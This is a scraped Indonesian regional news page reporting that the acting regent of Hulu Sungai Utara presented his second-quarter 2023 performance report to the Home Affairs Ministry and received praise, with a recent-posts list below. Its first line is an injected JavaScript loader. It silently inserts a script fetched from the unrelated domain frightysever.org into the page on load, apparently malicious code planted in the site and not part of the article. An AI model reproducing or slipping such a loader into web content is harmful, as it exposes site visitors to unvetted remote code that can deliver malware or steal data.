(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Hulu Sungai Utara

Laporkan Kinerja, Pj Bupati HSU Dapat Apresiasi Kemendagri


KANALKALIMANTAN.COM, AMUNTAI – Penjabat (Pj) Bupati Hulu Sungai Utara (HSU) Raden Suria Fadliansyah menyampaikan laporan capaian kinerja untuk triwulan kedua periode 21 Februari hingga 20 Mei 2023 ke Itjen Kemendagri di Jakarta, Selasa (23/5/2023).

Laporan kinerja Pj Bupati HSU itu diapresiasi dan dinilai baik oleh Kemendagri karena laporan telah dilakukan sistematis sesuai dengan aspek yang dilaporkan dengan indikator.

Laporan capaian kinerja yang dilaporkan meliputi aspek pemerintahan, aspek pembangunan dan aspek kemasyarakatan dengan 16 indikator capaian kinerja.

Dari hasil yang dilaporkan Pj Bupati HSU secara umum banyak progres yang telah dicapai dan meningkat kinerjanya.

Baca juga: Beli Tanah dan Mobil Lexus Diungkap Saksi di Sidang Kasus TPPU Mantan Bupati HST

Pj Bupati HSU menyampaikan ucapan terima kasih kepada semua pihak yang memberikan dukungan dan kerjasama sehingga dirinya bisa menyampaikan laporan kinerja untuk triwulan kedua.

“Kami merasa bersyukur karena laporan triwulan kedua diapresiasi oleh Kemendagri, karena menunjukkan progres dari pelaksanaan perencanaan di triwulan pertama dan apa yang dilaksanakan sudah on the track,” imbuhnya.

Suria juga menjelaskan bahwa apa yang telah direncanakan di triwulan pertama dan telah dilaksanakan di triwulan kedua akan lebih terlihat lagi hasilnya nanti di triwulan ketiga. “Meski di triwulan kedua ini juga sudah terlihat progres yang dicapai,” tambahnya.

Karenanya ia tetap berharap dukungan dan kerjasama dari semua pihak agar Pemkab HSU kedepannya semakin lebih baik dan maju.

Saat menyampaikan laporan, Pj Bupati HSU Raden Suria Fadliansyah didampingi Sekda HSU H Adi Lesmana, Asisten Bidang Pemerintahan dan Kesra, serta sejumlah kepala SKPD. (Kanalkalimantan.com/dew) 

Reporter : dew
Editor : kk


Risa

Recent Posts

Hari Museum Internasional 2024 “Museum untuk Pendidikan dan Penelitian”

KANALKALIMANTAN.COM - Hari Museum Internasional yang ditetapkan oleh ICOM dan dirayakan setiap tahun pada tanggal… Read More

2 jam ago

Masrumi dari Desa Sungai Namang HSU Raih Prestasi Nasional

KANALKALIMANTAN.COM, SOLO – Masrumi, guru honorer asal Desa Sungai Namang, Kecamatan Danau Panggang, Kabupaten Hulu… Read More

3 jam ago

Pemkab HSU Gelar Upacara HUT ke-75 Proklamasi ALRI Divisi IV Kalimantan

KANALKALIMANTAN.COM, AMUNTAI - Memperingati HUT ke-75 Proklamasi Pemerintahan Gubernur Tentara ALRI Divisi lV Pertahanan Kalimatan,… Read More

3 jam ago

Mantan Karyawan BPR Candi Agung Amuntai Dituntut 7 Tahun

Selewengkan Dana Nasabah, Rugikan Negara Rp779 Juta Read More

3 jam ago

Ungkap Kasus Curanmor di Banjarbaru, 4 Unit Motor Berplat Merah

7 Pelaku Ditangkap dengan Barbuk 21 Unit Sepeda Motor Read More

7 jam ago

Kontestan Kepala Daerah di Kalsel Ditantang Miliki Visi Majukan Perpustakaan

KANALKALIMANTAN.COM, BANJARMASIN - Tim Tenaga Ahli Gubernur Kalimantan Selatan (Kalsel) melakukan kunjungan ke Dinas Perpustakaan… Read More

9 jam ago

This website uses cookies.